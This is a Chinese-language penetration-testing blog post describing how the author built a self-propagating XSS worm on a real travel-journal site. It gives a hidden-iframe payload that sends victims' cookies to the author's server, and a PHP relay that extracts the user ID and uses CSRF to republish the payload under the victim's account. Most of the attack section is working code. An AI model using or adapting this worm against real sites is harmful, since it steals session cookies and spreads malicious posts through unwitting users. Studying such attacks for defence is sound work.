---
title: XSSWORM
date: 2019-03-31
tags:
  - Web
  - XSS
categories: 渗透测试
---


<font color=green>一个不错的XSSWORM需要许多知识，总的来说还是很有趣的</font>

<!--more-->

### <font color=dark>利用条件</font>

- 可以利用的XSS

  例如个人档案，留言处，发表的文章，发表的动态之类的

- 可控点

  XSS存在处的CSRF

### <font color=dark>所需知识</font>

- XSS
- Ajax 隐蔽的发送请求
- 同源策略 <http://noel.xin/2019/02/15/%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5/#more>

### <font color=dark>实现步骤</font>

1. 发现可利用的XSS，以留言处为例
2. 发表留言处存在CSRF
3. 发表带有XSS的留言，XSS的作用是发布留言同时可以做一些其他事，例如获取Cookie
4. 用户被感染，留言传播

### <font color=dark>实例分析</font>

以某游记系统为例具体分析一下

发表游记的参数中有一个直接输出，得到一枚储存型XSS

![](xssworm/1.png)

想要构成worm,我们需要让其他看了这篇游记的人也发表一篇带有恶意代码的游记

回到发表游记处，这里存在一个CSRF

```php
{"id":"******","userId":"*****","userName":"******","AssociateEntityList":[{"brandId":134,"brandName":"ABT",
"seriesId":2366,"seriesName":"ABT A3"}]
 ............
```

不过这里有一点儿问题

这里有id,userID,以及userName

后面经过测试发现发表游记的时候id和userName都可以为空，那么问题来了，userId怎么获得呢？

别忘了我们已经有一个储存型XSS了

发现Cookie里有一个

```
userid=97***548
```

**通过XSS将Cookie发送到自己的服务器上，同时对Cookie进行处理，得到userId,并进行CSRF操作**

可能有些同学这时候就有疑问了，为什么不直接用JavaScript处理呢？

原因是发表游记时值是Json的形式，使用JS很容易出错，如果使用转义符的话最后输出的时候转义符也会在，最后迫不得已选择了上述操作

我们可以构造储存型XSS啦！

```html
<script>
    var o=document.body;
    var a=document.createElement("iframe");a.src="http://noel.xin/cookie.php?Cookie="+document.cookie;
    a.style.opacity=0;
	o.appendChild(a);
</script>
```

利用得到的userID发表游记

index.php

```php+HTML
<?php
$Cookie = @$_GET['Cookie']?$_GET['Cookie']:'';
$start = strpos($Cookie,"userid")+10;
$id = substr($Cookie,$start,8);
?>
<script>
    var req = new XMLHttpRequest();
    var data = "jsonData={'id':0,'userId':<?=$id?>,'userName':'','XSS':'上述代码'}";
    req.open('post','https://target.com',true);
    req.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");
    req.withCredentials = true;
    req.send(data);
</script>
```

完成！

之后只要别人看了我发的游记后都会发一篇带有恶意代码的XSS，当然，为了爱和正义，文章立刻给删了。



> 也许不能喜欢你到天边的花火都枯萎，但真的梦想过与你，并肩去看一场烟火